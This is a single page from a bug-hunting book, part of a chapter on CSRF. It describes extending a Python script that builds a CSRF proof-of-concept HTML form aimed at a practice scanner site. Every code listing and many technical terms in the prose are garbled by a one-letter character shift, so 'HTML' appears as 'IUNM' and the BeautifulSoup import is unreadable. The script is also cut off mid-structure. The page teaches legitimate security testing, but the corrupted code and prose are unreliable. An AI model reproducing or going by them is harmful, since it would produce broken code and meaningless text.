Page 117 - Hands-On Bug Hunting for Penetration Testers

P. 117

CSRF and Insecure Session Authentication Chapter 6

Here's the result of those additional changes:

IUNM
GPSN
JOQVU OBNF GOBNF UZQF UFYU
JOQVU OBNF MOBNF UZQF UFYU
JOQVU OBNF OJDL UZQF UFYU
JOQVU UZQF TVCNJU WBMVF TVCNJU
GPSN
IUNM

To take this further, we need to extend our use of attributes, and finally use the other
variables (such as BDUJPO and NFUIPE) we defined earlier. We can do that while also
adding a MBCFM tag for each appropriate JOQVU field.

We can also extend our initial data structure to accompany some changes. Let's say we
want to add a WBMVF attribute to each JOQVU (as we have in our other PoC). We can do that
simply by adding an extra field in the dictionary for each form field.

Here's what it looks like when we put it all together:
VTS CJO FOW QZUIPO
GSPN CT JNQPSU #FBVUJGVM4PVQ

EFG HFOFSBUF@QPD
NFUIPE 1045
FODPEJOH@UZQF BQQMJDBUJPO Y XXX GPSN VSMFODPEFE
BDUJPO IUUQ XFCTDBOUFTU DPN DSPTTUSBJOJOH BCPVUZPV QIQ
GJFMET <
\
UZQF UFYU
OBNF GOBNF
MBCFM GOBNF
WBMVF 8JMMJBN
^
\
UZQF UFYU
OBNF MOBNF
MBCFM MOBNF
WBMVF .BOEFMMB
^
\
UZQF UFYU
OBNF OJDL
MBCFM OJDL
WBMVF .BKPS .BOEFMMB
^

[ 102 ]

112 113 114 115 116 117 118 119 120 121 122